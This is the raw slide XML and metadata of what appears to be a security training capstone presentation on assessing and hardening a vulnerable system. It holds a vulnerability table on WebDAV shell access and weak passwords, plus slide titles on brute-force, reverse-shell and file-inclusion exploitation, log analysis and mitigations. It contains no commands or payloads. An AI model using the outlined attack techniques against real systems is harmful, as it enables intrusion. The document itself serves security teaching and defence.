                        </a:rPr>
                        <a:t> Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="sng" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Exploit </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>webdav</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> on a server and shell access is possible</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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>If not configured properly attackers can use it to remotely modify website content</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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="694193">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak Passwords</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Short, common, simple and noncomplex passwords</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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak passwords can be cracked easily with tools and gain further access</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54043489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245</TotalTime>
  <Words>2217</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>295</Paragraphs>
  <Slides>29</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Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</vt:lpstr>
      <vt:lpstr>Table of Contents </vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: Open Web Port (80) CVE-2019-6579</vt:lpstr>
      <vt:lpstr>Exploitation: Open Web Port (80) CVE-2019-6579</vt:lpstr>
      <vt:lpstr>Exploitation: Brute-force Attack</vt:lpstr>
      <vt:lpstr>Exploitation: Brute-force Attack</vt:lpstr>
      <vt:lpstr>Exploitation: Reverse Shell Backdoor CVE-2019-13386</vt:lpstr>
      <vt:lpstr>Exploitation: Reverse Shell Backdoor CVE-2019-13386</vt:lpstr>
      <vt:lpstr>Exploitation: Local File Inclusion CVE-2021-31783</vt:lpstr>
      <vt:lpstr>Blue Team Log Analysis and  Attack Characterization</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan</vt:lpstr>
      <vt:lpstr>Analysis: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Analysis: Uncovering the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Analysis: Finding the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Blue Team Proposed Alarms and  Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Mitigation: Blocking the Port Scan</vt:lpstr>
      <vt:lpstr>Mitigation: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Mitigation: Preventing Brute Force Attacks</vt:lpstr>
      <vt:lpstr>Mitigation: Detecting the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Mitigation: Identifying Reverse Shell Uploads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Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</dc:title>
  <dc:creator>Zen</dc:creator>
  <cp:lastModifiedBy>Joey Zamora</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-23T23:45:56Z</dcterms:modified>
</cp:coreProperties>
</file>